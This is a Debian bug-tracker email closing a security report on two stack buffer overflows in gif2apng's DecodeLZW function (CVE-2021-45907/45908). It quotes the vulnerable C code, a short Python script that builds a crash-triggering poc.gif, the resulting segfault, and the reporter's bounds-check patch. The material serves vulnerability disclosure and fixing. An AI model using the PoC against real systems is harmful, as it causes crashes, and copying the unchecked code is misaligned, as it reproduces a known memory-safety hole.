Your message dated Mon, 07 Feb 2022 21:43:10 +0000 with message-id <e1nhbmw-0002k2...@fasolo.debian.org> and subject line Bug#1004933: Removed package(s) from unstable has caused the Debian Bug report #1002669, regarding gif2apng: CVE-2021-45907 CVE-2021-45908: Two stack based buffer overflows in the DecodeLZW function to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1002669: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1002669 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
--- Begin Message ---Package: gif2apng Version: 1.9+srconly-3 Severity: normal Tags: security Dear Maintainer, There are two stack based buffer overflows in the gif2apng application. The responsible code is located in the DecodeLZW function and looks as follows: void DecodeLZW(unsigned char * img, unsigned int img_size, FILE * f1) // added parameter img_size { int i, bits, codesize, codemask, clearcode, nextcode, lastcode; unsigned int j; unsigned int size = 0; unsigned int accum = 0; unsigned short prefix[4097]; unsigned char suffix[4097]; unsigned char str[4097]; unsigned char data[1024]; unsigned char firstchar = 0; unsigned char *pstr = str; unsigned char *pout = img; unsigned char mincodesize; if (fread(&mincodesize, 1, 1, f1) != 1) return; bits = 0; codesize = mincodesize + 1; codemask = (1 << codesize) - 1; clearcode = 1 << mincodesize; nextcode = clearcode + 2; lastcode = -1; for (i=0; i<clearcode; i++) suffix[i] = i; [...] while (code >= clearcode) { *pstr++ = suffix[code]; code = prefix[code]; } In both loops at the end it is possible to write over the boundaries of the buffer by providing certain values a part of the gif file. For the for loop we can provide a large value for mincodesize leading to a clearcode bigger than 4097 and therefore overflowing the buffer. In the while loop we can provide code values, that repeat so that prefix[code] results in the same code again. I wrote the following script to generate a poc.gif file: #!/bin/python3 # Writing to poc.gif f = open("poc.gif", "wb") # Data needed to enter the code path: beginning = b"GIF87a" + b"\x10\x00\x10\x00" + b"\x01" * 3 + b"\x2c" + b"\x01" * 9 f.write(beginning) mincode = b"\x07" # Uncomment the following line to trigger the other crash # mincode = b"\x10" f.write(mincode) # Size value and byte we write to the heap target_char = b"\x01" + b"\xff\xfe"*10000 f.write(target_char) f.close() The poc.gif file generated by the script does trigger the overflow in the while loop. If the other value for mincode is used it should trigger the overflow in the for loop. Using the poc.gif file as follows led to a segmentation fault: $ gif2apng -i0 poc.gif /dev/null gif2apng 1.9 using ZLIB Reading 'poc.gif'... Speicherzugriffsfehler As I see no way to control the data, that is written in the loops I do not think, that this can necessarily exploited to gain code execution. I fixed the issue locally by introducing a variable, that keeps track of the amount of data written to the pstr pointer and by doing some boundary checks before writing to the buffers: if (clearcode > 4097) { // Added to avoid stack overflow here printf("Invalid Image\n"); exit(0); } for (i=0; i<clearcode; i++) suffix[i] = i; [...] if (code >= nextcode) { if ( write_counter <= 4097) { // Added to fix stack overflow here *pstr++ = firstchar; write_counter++; code = lastcode; } else { printf("Invalid Image\n"); exit(0); } } while (code >= clearcode) { if ( write_counter <= 4097) { // Added to fix stack overflow here *pstr++ = suffix[code]; write_counter++; code = prefix[code]; } else { printf("Invalid Image\n"); exit(0); } } if ( write_counter <= 4097) { // Added to fix stack overflow here *pstr++ = firstchar = suffix[code]; write_counter++; } else { printf("Invalid Image\n"); exit(0); } This seemed to fix the issue for me locally, but it could use some more testing. Best regards Kolja -- System Information: Debian Release: 10.11 APT prefers oldstable-updates APT policy: (500, 'oldstable-updates'), (500, 'oldstable') Architecture: amd64 (x86_64) Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores) Kernel taint flags: TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de_DE.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /usr/bin/dash Init: systemd (via /run/systemd/system) LSM: AppArmor: enabled Versions of packages gif2apng depends on: ii libc6 2.28-10 ii libzopfli1 1.0.2-1 ii zlib1g 1:1.2.11.dfsg-1 gif2apng recommends no packages. Versions of packages gif2apng suggests: pn apng2gif <none> -- no debconf information
--- End Message ---
--- Begin Message ---Version: 1.9+srconly-3+rm Dear submitter, as the package gif2apng has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/1004933 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Scott Kitterman (the ftpmaster behind the curtain)
--- End Message ---
